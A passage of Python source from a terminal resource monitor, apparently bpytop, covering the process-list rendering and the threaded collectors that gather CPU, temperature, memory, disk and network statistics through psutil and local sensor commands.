f'{Mv.to(dy+1, dx+1)}{Fx.ub}{THEME.main_fg}{stat_color}{proc.details["status"]:^{iw}.{iw2}}{Fx.ub}{THEME.main_fg}{proc.details["uptime"]:^{iw}.{iw2}} ' +
(f'{proc.details["parent_name"]:^{iw}.{iw2}}' if dw > 28 else "") + (f'{proc.details["username"]:^{iw}.{iw2}}' if dw > 38 else "") +
(f'{proc.details["threads"]:^{iw}.{iw2}}' if expand > 0 else "") + (f'{proc.details["nice"]:^{iw}.{iw2}}' if expand > 1 else "") +
(f'{proc.details["io_read"]:^{iw}.{iw2}}' if expand > 2 else "") + (f'{proc.details["io_write"]:^{iw}.{iw2}}' if expand > 3 else "") +
(f'{proc.details["terminal"][-(iw2):]:^{iw}.{iw2}}' if expand > 4 else "") +
f'{Mv.to(dy+3, dx)}{THEME.title}{Fx.b}{("Memory: " if dw > 42 else "M:") + str(round(proc.details["memory_percent"], 1)) + "%":>{dw//3-1}}{Fx.ub} {THEME.inactive_fg}{"⡀"*(dw//3)}'
f'{Mv.l(dw//3)}{THEME.proc_misc}{Graphs.detailed_mem(None if cls.moved else proc.details_mem[-1])} '
f'{THEME.title}{Fx.b}{proc.details["memory_bytes"]:.{dw//3 - 2}}{THEME.main_fg}{Fx.ub}')
cy = dy + (4 if len(proc.details["cmdline"]) > dw - 5 else 5)
for i in range(ceil(len(proc.details["cmdline"]) / (dw - 5))):
out += f'{Mv.to(cy+i, dx + 3)}{proc.details["cmdline"][((dw-5)*i):][:(dw-5)]:{"^" if i == 0 else "<"}{dw-5}}'
if i == 2: break
#* Checking for selection out of bounds
if cls.start > proc.num_procs - cls.select_max + 1 and proc.num_procs > cls.select_max: cls.start = proc.num_procs - cls.select_max + 1
elif cls.start > proc.num_procs: cls.start = proc.num_procs
if cls.start < 1: cls.start = 1
if cls.selected > proc.num_procs and proc.num_procs < cls.select_max: cls.selected = proc.num_procs
elif cls.selected > cls.select_max: cls.selected = cls.select_max
if cls.selected < 0: cls.selected = 0
#* Start iteration over all processes and info
cy = 1
for n, (pid, items) in enumerate(proc.processes.items(), start=1):
if n < cls.start: continue
l_count += 1
if l_count == cls.selected:
is_selected = True
cls.selected_pid = pid
else: is_selected = False
indent, name, cmd, threads, username, mem, mem_b, cpu = [items.get(v, d) for v, d in [("indent", ""), ("name", ""), ("cmd", ""), ("threads", 0), ("username", "?"), ("mem", 0.0), ("mem_b", 0), ("cpu", 0.0)]]
if CONFIG.proc_tree:
arg_len = 0
offset = tree_len - len(f'{indent}{pid}')
if offset < 1: offset = 0
indent = f'{indent:.{tree_len - len(str(pid))}}'
if offset - len(name) > 12:
cmd = cmd.split(" ")[0].split("/")[-1]
if not cmd.startswith(name):
offset = len(name)
arg_len = tree_len - len(f'{indent}{pid} {name} ') + 2
cmd = f'({cmd[:(arg_len-4)]})'
else:
offset = prog_len - 1
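			#* Create a 5 char wide mini cpu graph for any process above 1% usage, removed again after more than 10 consecutive updates below 1%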
if cpu > 1.0 or pid in Graphs.pid_cpu:
if pid not in Graphs.pid_cpu:
Graphs.pid_cpu[pid] = Graph(5, 1, None, [0])
cls.pid_counter[pid] = 0
elif cpu < 1.0:
cls.pid_counter[pid] += 1
if cls.pid_counter[pid] > 10:
del cls.pid_counter[pid], Graphs.pid_cpu[pid]
else:
cls.pid_counter[pid] = 0
end = f'{THEME.main_fg}{Fx.ub}' if CONFIG.proc_colors else Fx.ub
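			#* calc = row distance from the current selection (or from the top when nothing is selected), used to fade the gradient colors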
if cls.selected > cy: calc = cls.selected - cy
elif 0 < cls.selected <= cy: calc = cy - cls.selected
else: calc = cy
if CONFIG.proc_colors and not is_selected:
vals = []
for v in [int(cpu), int(mem), int(threads // 3)]:
if CONFIG.proc_gradient:
val = ((v if v <= 100 else 100) + 100) - calc * 100 // cls.select_max
vals += [f'{THEME.gradient["proc_color" if val < 100 else "process"][val if val < 100 else val - 100]}']
else:
vals += [f'{THEME.gradient["process"][v if v <= 100 else 100]}']
c_color, m_color, t_color = vals
else:
c_color = m_color = t_color = Fx.b
if CONFIG.proc_gradient and not is_selected:
g_color = f'{THEME.gradient["proc"][calc * 100 // cls.select_max]}'
if is_selected:
c_color = m_color = t_color = g_color = end = ""
out += f'{THEME.selected_bg}{THEME.selected_fg}{Fx.b}'
#* Creates one line for a process with all gathered information
out += (f'{Mv.to(y+cy, x)}{g_color}{indent}{pid:>{(1 if CONFIG.proc_tree else 7)}} ' +
f'{c_color}{name:<{offset}.{offset}} {end}' +
(f'{g_color}{cmd:<{arg_len}.{arg_len-1}}' if arg_len else "") +
(t_color + (f'{threads:>4} ' if threads < 1000 else "999> ") + end if tr_show else "") +
(g_color + (f'{username:<9.9}' if len(username) < 10 else f'{username[:8]:<8}+') if usr_show else "") +
m_color + ((f'{mem:>4.1f}' if mem < 100 else f'{mem:>4.0f} ') if not CONFIG.proc_mem_bytes else f'{floating_humanizer(mem_b, short=True):>4.4}') + end +
f' {THEME.inactive_fg}{"⡀"*5}{THEME.main_fg}{g_color}{c_color}' + (f' {cpu:>4.1f} ' if cpu < 100 else f'{cpu:>5.0f} ') + end +
(" " if proc.num_procs > cls.select_max else ""))
#* Draw small cpu graph for process if cpu usage was above 1% in the last 10 updates
if pid in Graphs.pid_cpu:
out += f'{Mv.to(y+cy, x + w - (12 if proc.num_procs > cls.select_max else 11))}{c_color if CONFIG.proc_colors else THEME.proc_misc}{Graphs.pid_cpu[pid](None if cls.moved else round(cpu))}{THEME.main_fg}'
if is_selected: out += f'{Fx.ub}{Term.fg}{Term.bg}{Mv.to(y+cy, x + w - 1)}{" " if proc.num_procs > cls.select_max else ""}'
cy += 1
if cy == h: break
if cy < h:
for i in range(h-cy):
out += f'{Mv.to(y+cy+i, x)}{" " * w}'
#* Draw scrollbar if needed
if proc.num_procs > cls.select_max:
if cls.resized:
Key.mouse["mouse_scroll_up"] = [[x+w-2+i, y] for i in range(3)]
Key.mouse["mouse_scroll_down"] = [[x+w-2+i, y+h-1] for i in range(3)]
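			#* Map the index of the first shown process onto the scrollbar track and clamp it to the box height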
scroll_pos = round(cls.start * (cls.select_max - 2) / (proc.num_procs - (cls.select_max - 2)))
if scroll_pos < 0 or cls.start == 1: scroll_pos = 0
elif scroll_pos > h - 3 or cls.start >= proc.num_procs - cls.select_max: scroll_pos = h - 3
out += (f'{Mv.to(y, x+w-1)}{Fx.b}{THEME.main_fg}↑{Mv.to(y+h-1, x+w-1)}↓{Fx.ub}'
f'{Mv.to(y+1+scroll_pos, x+w-1)}█')
		elif "mouse_scroll_up" in Key.mouse:
			del Key.mouse["mouse_scroll_up"], Key.mouse["mouse_scroll_down"]
#* Draw current selection and number of processes
out += (f'{Mv.to(y+h, x + w - 3 - len(loc_string))}{THEME.proc_box}{Symbol.title_left}{THEME.title}'
f'{Fx.b}{loc_string}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
#* Clean up dead processes graphs and counters
cls.count += 1
if cls.count == 100:
			cls.count = 0
for p in list(cls.pid_counter):
if not psutil.pid_exists(p):
del cls.pid_counter[p], Graphs.pid_cpu[p]
Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active)
cls.redraw = cls.resized = cls.moved = False
class Collector:
'''Data collector master class
* .start(): Starts collector thread
* .stop(): Stops collector thread
* .collect(*collectors: Collector, draw_now: bool = True, interrupt: bool = False): queues up collectors to run'''
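	#* Minimal usage sketch (illustrative only, not taken from the actual call sites):
	#*   Collector.start()                                # spawn the background runner thread
	#*   Collector.collect(CpuCollector, draw_now=True)   # queue one collector and draw when the pass is done
	#*   Collector.collect_done.wait(2)                   # block until the pass has finished
	#*   Collector.stop()                                 # join the thread on shutdown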
stopping: bool = False
started: bool = False
draw_now: bool = False
redraw: bool = False
only_draw: bool = False
thread: threading.Thread
collect_run = threading.Event()
collect_idle = threading.Event()
collect_idle.set()
collect_done = threading.Event()
collect_queue: List = []
collect_interrupt: bool = False
proc_interrupt: bool = False
use_draw_list: bool = False
@classmethod
def start(cls):
cls.stopping = False
cls.thread = threading.Thread(target=cls._runner, args=())
cls.thread.start()
cls.started = True
@classmethod
def stop(cls):
if cls.started and cls.thread.is_alive():
cls.stopping = True
cls.started = False
cls.collect_queue = []
cls.collect_idle.set()
cls.collect_done.set()
try:
cls.thread.join()
except:
pass
@classmethod
def _runner(cls):
		'''This is meant to run in its own thread, collecting and drawing when collect_run is set'''
draw_buffers: List[str] = []
debugged: bool = False
try:
while not cls.stopping:
if CONFIG.draw_clock and CONFIG.update_ms != 1000: Box.draw_clock()
cls.collect_run.wait(0.1)
if not cls.collect_run.is_set():
continue
draw_buffers = []
cls.collect_interrupt = False
cls.collect_run.clear()
cls.collect_idle.clear()
cls.collect_done.clear()
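				#* Pop and run every queued collector, then draw it; a set collect_interrupt flag aborts the pass early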
if DEBUG and not debugged: TimeIt.start("Collect and draw")
while cls.collect_queue:
collector = cls.collect_queue.pop()
if not cls.only_draw:
collector._collect()
collector._draw()
if cls.use_draw_list: draw_buffers.append(collector.buffer)
if cls.collect_interrupt: break
if DEBUG and not debugged: TimeIt.stop("Collect and draw"); debugged = True
if cls.draw_now and not Menu.active and not cls.collect_interrupt:
if cls.use_draw_list: Draw.out(*draw_buffers)
else: Draw.out()
if CONFIG.draw_clock and CONFIG.update_ms == 1000: Box.draw_clock()
cls.collect_idle.set()
cls.collect_done.set()
except Exception as e:
errlog.exception(f'Data collection thread failed with exception: {e}')
cls.collect_idle.set()
cls.collect_done.set()
clean_quit(1, thread=True)
@classmethod
def collect(cls, *collectors, draw_now: bool = True, interrupt: bool = False, proc_interrupt: bool = False, redraw: bool = False, only_draw: bool = False):
'''Setup collect queue for _runner'''
cls.collect_interrupt = interrupt
cls.proc_interrupt = proc_interrupt
cls.collect_idle.wait()
cls.collect_interrupt = False
cls.proc_interrupt = False
cls.use_draw_list = False
cls.draw_now = draw_now
cls.redraw = redraw
cls.only_draw = only_draw
if collectors:
cls.collect_queue = [*collectors]
cls.use_draw_list = True
else:
cls.collect_queue = list(cls.__subclasses__())
cls.collect_run.set()
class CpuCollector(Collector):
'''Collects cpu usage for cpu and cores, cpu frequency, load_avg, uptime and cpu temps'''
cpu_usage: List[List[int]] = []
cpu_temp: List[List[int]] = []
cpu_temp_high: int = 0
cpu_temp_crit: int = 0
for _ in range(THREADS + 1):
cpu_usage.append([])
cpu_temp.append([])
freq_error: bool = False
cpu_freq: int = 0
load_avg: List[float] = []
uptime: str = ""
buffer: str = CpuBox.buffer
sensor_method: str = ""
got_sensors: bool = False
sensor_swap: bool = False
cpu_temp_only: bool = False
@classmethod
def get_sensors(cls):
'''Check if we can get cpu temps and return method of getting temps'''
cls.sensor_method = ""
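		#* Resolution order: coretemp/osx-cpu-temp on MacOS, a user selected psutil sensor, auto detected psutil sensors, then vcgencmd on Linux as a last resort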
if SYSTEM == "MacOS":
try:
if which("coretemp") and subprocess.check_output(["coretemp", "-p"], text=True).strip().replace("-", "").isdigit():
cls.sensor_method = "coretemp"
elif which("osx-cpu-temp") and subprocess.check_output("osx-cpu-temp", text=True).rstrip().endswith("°C"):
cls.sensor_method = "osx-cpu-temp"
except: pass
elif CONFIG.cpu_sensor != "Auto" and CONFIG.cpu_sensor in CONFIG.cpu_sensors:
cls.sensor_method = "psutil"
elif hasattr(psutil, "sensors_temperatures"):
try:
temps = psutil.sensors_temperatures()
if temps:
for name, entries in temps.items():
if name.lower().startswith("cpu"):
cls.sensor_method = "psutil"
break
for entry in entries:
if entry.label.startswith(("Package", "Core 0", "Tdie", "CPU")):
cls.sensor_method = "psutil"
break
except: pass
if not cls.sensor_method and SYSTEM == "Linux":
try:
if which("vcgencmd") and subprocess.check_output(["vcgencmd", "measure_temp"], text=True).strip().endswith("'C"):
cls.sensor_method = "vcgencmd"
except: pass
cls.got_sensors = bool(cls.sensor_method)
@classmethod
def _collect(cls):
cls.cpu_usage[0].append(round(psutil.cpu_percent(percpu=False)))
if len(cls.cpu_usage[0]) > Term.width * 4:
del cls.cpu_usage[0][0]
for n, thread in enumerate(psutil.cpu_percent(percpu=True), start=1):
cls.cpu_usage[n].append(round(thread))
if len(cls.cpu_usage[n]) > Term.width * 2:
del cls.cpu_usage[n][0]
try:
if hasattr(psutil.cpu_freq(), "current"):
cls.cpu_freq = round(psutil.cpu_freq().current)
except Exception as e:
if not cls.freq_error:
cls.freq_error = True
errlog.error("Exception while getting cpu frequency!")
errlog.exception(f'{e}')
else:
pass
cls.load_avg = [round(lavg, 2) for lavg in os.getloadavg()]
cls.uptime = str(timedelta(seconds=round(time()-psutil.boot_time(),0)))[:-3]
if CONFIG.check_temp and cls.got_sensors:
cls._collect_temps()
@classmethod
def _collect_temps(cls):
temp: int = 1000
cores: List[int] = []
core_dict: Dict[int, int] = {}
entry_int: int = 0
cpu_type: str = ""
s_name: str = "_-_"
s_label: str = "_-_"
if cls.sensor_method == "psutil":
try:
if CONFIG.cpu_sensor != "Auto":
s_name, s_label = CONFIG.cpu_sensor.split(":", 1)
for name, entries in psutil.sensors_temperatures().items():
for num, entry in enumerate(entries, 1):
if name == s_name and (entry.label == s_label or str(num) == s_label) and round(entry.current) > 0:
if entry.label.startswith("Package"):
cpu_type = "intel"
elif entry.label.startswith("Tdie"):
cpu_type = "ryzen"
else:
cpu_type = "other"
if getattr(entry, "high", None) != None and entry.high > 1: cls.cpu_temp_high = round(entry.high)
else: cls.cpu_temp_high = 80
if getattr(entry, "critical", None) != None and entry.critical > 1: cls.cpu_temp_crit = round(entry.critical)
else: cls.cpu_temp_crit = 95
temp = round(entry.current)
elif entry.label.startswith(("Package", "Tdie")) and cpu_type in ["", "other"] and s_name == "_-_" and hasattr(entry, "current") and round(entry.current) > 0:
if not cls.cpu_temp_high or cls.sensor_swap or cpu_type == "other":
cls.sensor_swap = False
if getattr(entry, "high", None) != None and entry.high > 1: cls.cpu_temp_high = round(entry.high)
else: cls.cpu_temp_high = 80
if getattr(entry, "critical", None) != None and entry.critical > 1: cls.cpu_temp_crit = round(entry.critical)
else: cls.cpu_temp_crit = 95
cpu_type = "intel" if entry.label.startswith("Package") else "ryzen"
temp = round(entry.current)
elif (entry.label.startswith(("Core", "Tccd", "CPU")) or (name.lower().startswith("cpu") and not entry.label)) and hasattr(entry, "current") and round(entry.current) > 0:
if entry.label.startswith(("Core", "Tccd")):
entry_int = int(entry.label.replace("Core", "").replace("Tccd", ""))
if entry_int in core_dict:
continue
core_dict[entry_int] = round(entry.current)
continue
elif cpu_type in ["intel", "ryzen"]:
continue
if not cpu_type:
cpu_type = "other"
if not cls.cpu_temp_high or cls.sensor_swap:
cls.sensor_swap = False
if getattr(entry, "high", None) != None and entry.high > 1: cls.cpu_temp_high = round(entry.high)
else: cls.cpu_temp_high = 60 if name == "cpu_thermal" else 80
if getattr(entry, "critical", None) != None and entry.critical > 1: cls.cpu_temp_crit = round(entry.critical)
else: cls.cpu_temp_crit = 80 if name == "cpu_thermal" else 95
temp = round(entry.current)
cores.append(round(entry.current))
if core_dict:
					if not temp or temp == 1000:
						temp = round(sum(core_dict.values()) / len(core_dict))
if not cls.cpu_temp_high or not cls.cpu_temp_crit:
cls.cpu_temp_high, cls.cpu_temp_crit = 80, 95
cls.cpu_temp[0].append(temp)
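					#* Only one Tccd reading per CCD is reported, so spread it over the threads CORE_MAP assigns to that CCD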
if cpu_type == "ryzen":
ccds: int = len(core_dict)
cores_per_ccd: int = CORES // ccds
z: int = 1
for x in range(THREADS):
if x == CORES:
z = 1
if CORE_MAP[x] + 1 > cores_per_ccd * z:
z += 1
cls.cpu_temp[x+1].append(core_dict[z])
else:
for x in range(THREADS):
if not CORE_MAP[x] in core_dict:
continue
cls.cpu_temp[x+1].append(core_dict[CORE_MAP[x]])
elif len(cores) == THREADS / 2:
cls.cpu_temp[0].append(temp)
for n, t in enumerate(cores, start=1):
try:
cls.cpu_temp[n].append(t)
cls.cpu_temp[THREADS // 2 + n].append(t)
except IndexError:
break
else:
cls.cpu_temp[0].append(temp)
if len(cores) > 1:
for n, t in enumerate(cores, start=1):
try:
cls.cpu_temp[n].append(t)
except IndexError:
break
except Exception as e:
errlog.exception(f'{e}')
cls.got_sensors = False
CpuBox._calc_size()
else:
try:
if cls.sensor_method == "coretemp":
temp = max(0, int(subprocess.check_output(["coretemp", "-p"], text=True).strip()))
cores = [max(0, int(x)) for x in subprocess.check_output("coretemp", text=True).split()]
if len(cores) == THREADS / 2:
cls.cpu_temp[0].append(temp)
for n, t in enumerate(cores, start=1):
try:
cls.cpu_temp[n].append(t)
cls.cpu_temp[THREADS // 2 + n].append(t)
except IndexError:
break
else:
cores.insert(0, temp)
for n, t in enumerate(cores):
try:
cls.cpu_temp[n].append(t)
except IndexError:
break
if not cls.cpu_temp_high:
cls.cpu_temp_high = 85
cls.cpu_temp_crit = 100
elif cls.sensor_method == "osx-cpu-temp":
temp = max(0, round(float(subprocess.check_output("osx-cpu-temp", text=True).strip()[:-2])))
if not cls.cpu_temp_high:
cls.cpu_temp_high = 85
cls.cpu_temp_crit = 100
elif cls.sensor_method == "vcgencmd":
temp = max(0, round(float(subprocess.check_output(["vcgencmd", "measure_temp"], text=True).strip()[5:-2])))
if not cls.cpu_temp_high:
cls.cpu_temp_high = 60
cls.cpu_temp_crit = 80
except Exception as e:
errlog.exception(f'{e}')
cls.got_sensors = False
CpuBox._calc_size()
else:
if not cores:
cls.cpu_temp[0].append(temp)
if not core_dict and len(cores) <= 1:
cls.cpu_temp_only = True
if len(cls.cpu_temp[0]) > 5:
for n in range(len(cls.cpu_temp)):
if cls.cpu_temp[n]:
del cls.cpu_temp[n][0]
@classmethod
def _draw(cls):
CpuBox._draw_fg()
class MemCollector(Collector):
'''Collects memory and disks information'''
values: Dict[str, int] = {}
vlist: Dict[str, List[int]] = {}
percent: Dict[str, int] = {}
string: Dict[str, str] = {}
swap_values: Dict[str, int] = {}
swap_vlist: Dict[str, List[int]] = {}
swap_percent: Dict[str, int] = {}
swap_string: Dict[str, str] = {}
disks: Dict[str, Dict]
disk_hist: Dict[str, Tuple] = {}
timestamp: float = time()
io_error: bool = False
old_disks: List[str] = []
excludes: List[str] = ["squashfs"]
if SYSTEM == "BSD": excludes += ["devfs", "tmpfs", "procfs", "linprocfs", "gvfs", "fusefs"]
buffer: str = MemBox.buffer
@classmethod
def _collect(cls):
#* Collect memory
mem = psutil.virtual_memory()
if hasattr(mem, "cached"):
cls.values["cached"] = mem.cached
else:
cls.values["cached"] = mem.active
cls.values["total"], cls.values["free"], cls.values["available"] = mem.total, mem.free, mem.available
cls.values["used"] = cls.values["total"] - cls.values["available"]
for key, value in cls.values.items():
cls.string[key] = floating_humanizer(value)
if key == "total": continue
cls.percent[key] = round(value * 100 / cls.values["total"])
if CONFIG.mem_graphs:
if not key in cls.vlist: cls.vlist[key] = []
cls.vlist[key].append(cls.percent[key])
if len(cls.vlist[key]) > MemBox.width: del cls.vlist[key][0]
#* Collect swap
if CONFIG.show_swap or CONFIG.swap_disk:
swap = psutil.swap_memory()
cls.swap_values["total"], cls.swap_values["free"] = swap.total, swap.free
cls.swap_values["used"] = cls.swap_values["total"] - cls.swap_values["free"]
if swap.total:
if not MemBox.swap_on:
MemBox.redraw = True
MemBox.swap_on = True
for key, value in cls.swap_values.items():
cls.swap_string[key] = floating_humanizer(value)
if key == "total": continue
cls.swap_percent[key] = round(value * 100 / cls.swap_values["total"])
if CONFIG.mem_graphs:
if not key in cls.swap_vlist: cls.swap_vlist[key] = []
cls.swap_vlist[key].append(cls.swap_percent[key])
if len(cls.swap_vlist[key]) > MemBox.width: del cls.swap_vlist[key][0]
else:
if MemBox.swap_on:
MemBox.redraw = True
MemBox.swap_on = False
else:
if MemBox.swap_on:
MemBox.redraw = True
MemBox.swap_on = False
if not CONFIG.show_disks: return
#* Collect disks usage
disk_read: int = 0
disk_write: int = 0
dev_name: str
disk_name: str
filtering: Tuple = ()
filter_exclude: bool = False
io_string: str
u_percent: int
disk_list: List[str] = []
cls.disks = {}
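		#* disks_filter is a comma separated list of mountpoint names; an "exclude=" prefix turns it into an exclusion filter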
if CONFIG.disks_filter:
if CONFIG.disks_filter.startswith("exclude="):
filter_exclude = True
filtering = tuple(v.strip() for v in CONFIG.disks_filter.replace("exclude=", "").strip().split(","))
else:
filtering = tuple(v.strip() for v in CONFIG.disks_filter.strip().split(","))
try:
io_counters = psutil.disk_io_counters(perdisk=SYSTEM == "Linux", nowrap=True)
except ValueError as e:
if not cls.io_error:
cls.io_error = True
errlog.error(f'Non fatal error during disk io collection!')
if psutil.version_info[0] < 5 or (psutil.version_info[0] == 5 and psutil.version_info[1] < 7):
errlog.error(f'Caused by outdated psutil version.')
errlog.exception(f'{e}')
io_counters = None
for disk in psutil.disk_partitions():
disk_io = None
io_string = ""
disk_name = disk.mountpoint.rsplit('/', 1)[-1] if not disk.mountpoint == "/" else "root"
while disk_name in disk_list: disk_name += "_"
disk_list += [disk_name]
if cls.excludes and disk.fstype in cls.excludes:
continue
if filtering and ((not filter_exclude and not disk_name.endswith(filtering)) or (filter_exclude and disk_name.endswith(filtering))):
continue
#elif filtering and disk_name.endswith(filtering)
if SYSTEM == "MacOS" and disk.mountpoint == "/private/var/vm":
continue
try:
disk_u = psutil.disk_usage(disk.mountpoint)
except:
				continue
u_percent = round(disk_u.percent)
cls.disks[disk.device] = { "name" : disk_name, "used_percent" : u_percent, "free_percent" : 100 - u_percent }
for name in ["total", "used", "free"]:
cls.disks[disk.device][name] = floating_humanizer(getattr(disk_u, name, 0))
#* Collect disk io
if io_counters:
try:
if SYSTEM == "Linux":
dev_name = os.path.realpath(disk.device).rsplit('/', 1)[-1]
if dev_name.startswith("md"):
try:
dev_name = dev_name[:dev_name.index("p")]
except:
pass
disk_io = io_counters[dev_name]
elif disk.mountpoint == "/":
disk_io = io_counters
else:
raise Exception
disk_read = round((disk_io.read_bytes - cls.disk_hist[disk.device][0]) / (time() - cls.timestamp))
disk_write = round((disk_io.write_bytes - cls.disk_hist[disk.device][1]) / (time() - cls.timestamp))
except:
disk_read = disk_write = 0
else:
disk_read = disk_write = 0
if disk_io:
cls.disk_hist[disk.device] = (disk_io.read_bytes, disk_io.write_bytes)
if MemBox.disks_width > 30:
if disk_read > 0:
io_string += f'▲{floating_humanizer(disk_read, short=True)} '
if disk_write > 0:
io_string += f'▼{floating_humanizer(disk_write, short=True)}'
elif disk_read + disk_write > 0:
io_string += f'▼▲{floating_humanizer(disk_read + disk_write, short=True)}'
cls.disks[disk.device]["io"] = io_string
if CONFIG.swap_disk and MemBox.swap_on:
cls.disks["__swap"] = { "name" : "swap", "used_percent" : cls.swap_percent["used"], "free_percent" : cls.swap_percent["free"], "io" : "" }
for name in ["total", "used", "free"]:
cls.disks["__swap"][name] = cls.swap_string[name]
if len(cls.disks) > 2:
try:
new = { list(cls.disks)[0] : cls.disks.pop(list(cls.disks)[0])}
new["__swap"] = cls.disks.pop("__swap")
new.update(cls.disks)
cls.disks = new
except:
pass
if disk_list != cls.old_disks:
MemBox.redraw = True
cls.old_disks = disk_list.copy()
cls.timestamp = time()
@classmethod
def _draw(cls):
MemBox._draw_fg()
class NetCollector(Collector):
'''Collects network stats'''
buffer: str = NetBox.buffer
nics: List[str] = []
nic_i: int = 0
nic: str = ""
new_nic: str = ""
nic_error: bool = False
reset: bool = False
graph_raise: Dict[str, int] = {"download" : 5, "upload" : 5}
graph_lower: Dict[str, int] = {"download" : 5, "upload" : 5}
#min_top: int = 10<<10
	#* Stats structure = stats[network device][download, upload][total, last, top, graph_top, offset, speed, redraw, graph_raise, graph_low] = int, List[int], bool
stats: Dict[str, Dict[str, Dict[str, Any]]] = {}
#* Strings structure strings[network device][download, upload][total, byte_ps, bit_ps, top, graph_top] = str
strings: Dict[str, Dict[str, Dict[str, str]]] = {}
switched: bool = False
timestamp: float = time()
net_min: Dict[str, int] = {"download" : -1, "upload" : -1}
auto_min: bool = CONFIG.net_auto
sync_top: int = 0
sync_string: str = ""
@classmethod
def _get_nics(cls):
'''Get a list of all network devices sorted by highest throughput'''
cls.nic_i = 0
cls.nic = ""
try:
io_all = psutil.net_io_counters(pernic=True)
except Exception as e:
if not cls.nic_error:
cls.nic_error = True
errlog.exception(f'{e}')
if not io_all: return
up_stat = psutil.net_if_stats()
for nic in sorted(io_all.keys(), key=lambda nic: (getattr(io_all[nic], "bytes_recv", 0) + getattr(io_all[nic], "bytes_sent", 0)), reverse=True):
if nic not in up_stat or not up_stat[nic].isup:
continue
cls.nics.append(nic)
if not cls.nics: cls.nics = [""]
cls.nic = cls.nics[cls.nic_i]
@classmethod
def switch(cls, key: str):
if len(cls.nics) < 2: return
cls.nic_i += +1 if key == "n" else -1
if cls.nic_i >= len(cls.nics): cls.nic_i = 0
elif cls.nic_i < 0: cls.nic_i = len(cls.nics) - 1
cls.new_nic = cls.nics[cls.nic_i]
cls.switched = True
Collector.collect(NetCollector, redraw=True)
@classmethod
def _collect(cls):
speed: int
stat: Dict
up_stat = psutil.net_if_stats()
if cls.switched:
cls.nic = cls.new_nic
cls.switched = False
if not cls.nic or cls.nic not in up_stat or not up_stat[cls.nic].isup:
cls._get_nics()
if not cls.nic: return
try:
io_all = psutil.net_io_counters(pernic=True)[cls.nic]
except KeyError:
			return
if not cls.nic in cls.stats:
cls.stats[cls.nic] = {}
cls.strings[cls.nic] = { "download" : {}, "upload" : {}}
for direction, value in ["download", io_all.bytes_recv], ["upload", io_all.bytes_sent]:
cls.stats[cls.nic][direction] = { "total" : value, "last" : value, "top" : 0, "graph_top" : 0, "offset" : 0, "speed" : [], "redraw" : True, "graph_raise" : 0, "graph_lower" : 7 }
for v in ["total", "byte_ps", "bit_ps", "top", "graph_top"]:
cls.strings[cls.nic][direction][v] = ""
cls.stats[cls.nic]["download"]["total"] = io_all.bytes_recv
cls.stats[cls.nic]["upload"]["total"] = io_all.bytes_sent
for direction in ["download", "upload"]:
stat = cls.stats[cls.nic][direction]
strings = cls.strings[cls.nic][direction]
#* Calculate current speed
stat["speed"].append(round((stat["total"] - stat["last"]) / (time() - cls.timestamp)))
stat["last"] = stat["total"]
speed = stat["speed"][-1]
if cls.net_min[direction] == -1:
cls.net_min[direction] = units_to_bytes(getattr(CONFIG, "net_" + direction))
stat["graph_top"] = cls.net_min[direction]
stat["graph_lower"] = 7
if not cls.auto_min:
stat["redraw"] = True
strings["graph_top"] = floating_humanizer(stat["graph_top"], short=True)
if stat["offset"] and stat["offset"] > stat["total"]:
cls.reset = True
if cls.reset:
if not stat["offset"]:
stat["offset"] = stat["total"]
else:
stat["offset"] = 0
if direction == "upload":
cls.reset = False
NetBox.redraw = True
if len(stat["speed"]) > NetBox.width * 2:
del stat["speed"][0]
strings["total"] = floating_humanizer(stat["total"] - stat["offset"])
strings["byte_ps"] = floating_humanizer(stat["speed"][-1], per_second=True)
strings["bit_ps"] = floating_humanizer(stat["speed"][-1], bit=True, per_second=True)
if speed > stat["top"] or not stat["top"]:
stat["top"] = speed
strings["top"] = floating_humanizer(stat["top"], bit=True, per_second=True)
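			#* Auto rescaling: count samples above the current graph top (graph_raise) and samples below a tenth of it (graph_lower), rescale and redraw after 5 hits in either direction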
if cls.auto_min:
if speed > stat["graph_top"]:
stat["graph_raise"] += 1
if stat["graph_lower"] > 0: stat["graph_lower"] -= 1
elif speed < stat["graph_top"] // 10:
stat["graph_lower"] += 1
if stat["graph_raise"] > 0: stat["graph_raise"] -= 1
if stat["graph_raise"] >= 5 or stat["graph_lower"] >= 5:
if stat["graph_raise"] >= 5:
stat["graph_top"] = round(max(stat["speed"][-5:]) / 0.8)
elif stat["graph_lower"] >= 5:
stat["graph_top"] = max(10 << 10, max(stat["speed"][-5:]) * 3)
stat["graph_raise"] = 0
stat["graph_lower"] = 0
stat["redraw"] = True
strings["graph_top"] = floating_humanizer(stat["graph_top"], short=True)
cls.timestamp = time()
if CONFIG.net_sync:
c_max: int = max(cls.stats[cls.nic]["download"]["graph_top"], cls.stats[cls.nic]["upload"]["graph_top"])
if c_max != cls.sync_top:
cls.sync_top = c_max
cls.sync_string = floating_humanizer(cls.sync_top, short=True)
NetBox.redraw = True
@classmethod
def _draw(cls):
NetBox._draw_fg()
class ProcCollector(Collector):
'''Collects process stats'''
buffer: str = ProcBox.buffer
search_filter: str = ""
processes: Dict = {}
num_procs: int = 0
det_cpu: float = 0.0
detailed: bool = False
detailed_pid: Union[int, None] = None
details: Dict[str, Any] = {}
details_cpu: List[int] = []
details_mem: List[int] = []
expand: int = 0
collapsed: Dict = {}
tree_counter: int = 0
p_values: List[str] = ["pid", "name", "cmdline", "num_threads", "username", "memory_percent", "cpu_percent", "cpu_times", "create_time"]
sort_expr: Dict = {}
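	#* Pre-compiled expressions, eval():ed against each psutil process "p" to produce the sorting key for every sorting option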
sort_expr["pid"] = compile("p.info['pid']", "str", "eval")
sort_expr["program"] = compile("'' if p.info['name'] == 0.0 else p.info['name']", "str", "eval")
sort_expr["arguments"] = compile("' '.join(str(p.info['cmdline'])) or ('' if p.info['name'] == 0.0 else p.info['name'])", "str", "eval")
sort_expr["threads"] = compile("0 if p.info['num_threads'] == 0.0 else p.info['num_threads']", "str", "eval")
sort_expr["user"] = compile("'' if p.info['username'] == 0.0 else p.info['username']", "str", "eval")
sort_expr["memory"] = compile("p.info['memory_percent']", "str", "eval")
sort_expr["cpu lazy"] = compile("(sum(p.info['cpu_times'][:2] if not p.info['cpu_times'] == 0.0 else [0.0, 0.0]) * 1000 / (time() - p.info['create_time']))", "str", "eval")
sort_expr["cpu responsive"] = compile("(p.info['cpu_percent'] if CONFIG.proc_per_core else (p.info['cpu_percent'] / THREADS))", "str", "eval")
@classmethod
def _collect(cls):
		'''List all processes with pid, name, arguments, threads, username, memory percent and cpu percent'''
if Box.stat_mode: return
out: Dict = {}
